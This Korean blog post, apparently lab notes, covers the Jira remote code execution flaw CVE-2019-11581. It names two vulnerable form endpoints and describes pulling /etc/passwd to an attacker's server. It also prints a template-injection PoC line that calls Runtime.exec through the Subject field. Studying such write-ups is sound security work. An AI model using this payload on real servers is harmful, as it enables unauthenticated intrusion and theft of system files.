# 나/exploit CVE
[CVE-2019-11581] Atlassian Jira RCE 취약점
SaltLee
2019. 7. 15. 17:08
https://hub.docker.com/r/cptactionhank/atlassian-jira
https://medium.com/@ruvlol/rce-in-jira-cve-2019-11581-901b845f0f
취약 포인트가 2개인데
/secure/ContactAdministrators!default.jspa → 관리자 연락 양식 ON(Default OFF), 로그인은 불필요
/secure/admin/SendBulkMail!default.jspa → 관리자 로그인 필요
전제조건
위에 관리자 연락 양식 ON 되어 있으면 인증없이 취약 페이지에 접근 가능함
Subject 란이 취약 포인트이므로 여기에 원격 명령어 실행 코드 작성한다
(타겟의 /etc/passwd 읽어와서 공격자의 웹 서버에 pentest.html 란 파일로 생성하여 올리는 코드)
공격자의 웹 서버에 pentest.html 생성됨~
PoC
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('').waitFor()
두번째 취약 페이지도 제목란이 취약
여기에 동일하게 PoC 테스트 가능하다